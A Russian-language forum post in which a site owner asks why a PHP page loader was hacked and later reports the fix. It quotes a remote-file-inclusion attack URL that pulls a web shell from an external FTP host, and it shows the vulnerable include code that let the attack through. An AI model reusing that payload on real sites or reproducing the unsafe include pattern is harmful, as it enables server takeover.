на моем сайте сделано условно так
URL
//<my_site>/index.php?page=xxxxxx

$var = filter_var( $_REQUEST['page'],FILTER_SANITIZE_STRING, FILTER_FLAG_ENCODE_AMP);

var простым перебором сравнивается с массивом строк и если сходится, вызывается
/<my_site>/var_cnt.php

если в массиве $var не находится, но существует файл ,_cnt2.php, тогда переходим к $var_cnt2.php
т.е. само значение var никуда не попадает, нигде напрямик не используется

столкнулся со взломом в виде запроса
//my_sity/index.php?page=ftp://<log>:<pass>@ftp.freehostia.com/tmp.php?

там лежит некий хакерский файл
и у меня на экране появляется хак-интерфейс доступа к файлам, каталогам и т.д. на моем сайте
с заголовком
Irc.indoirc.net - #Br4|n

что я сделал не так и как защититься ?

перебором - это правда, перебором

foreach($pages as $value) {
if ($var==$value)
include $var."_cnt.php"
$found=1;
}

переход - да, лажа. include.

if ((!$found)&&(file_exists($var."_cnt2.php")))
include $var."_cnt2.php";
else
include no_content.php";

исследования уточнили проблему
filter_var() работает не так, как мной ожидалось (кто бы мог подумать))) ) и последний знак "?" отсекал "_cnt2.php"

решил все удалением из переданной строки всех не-букв

Hett
спасибо,
протупил, конечно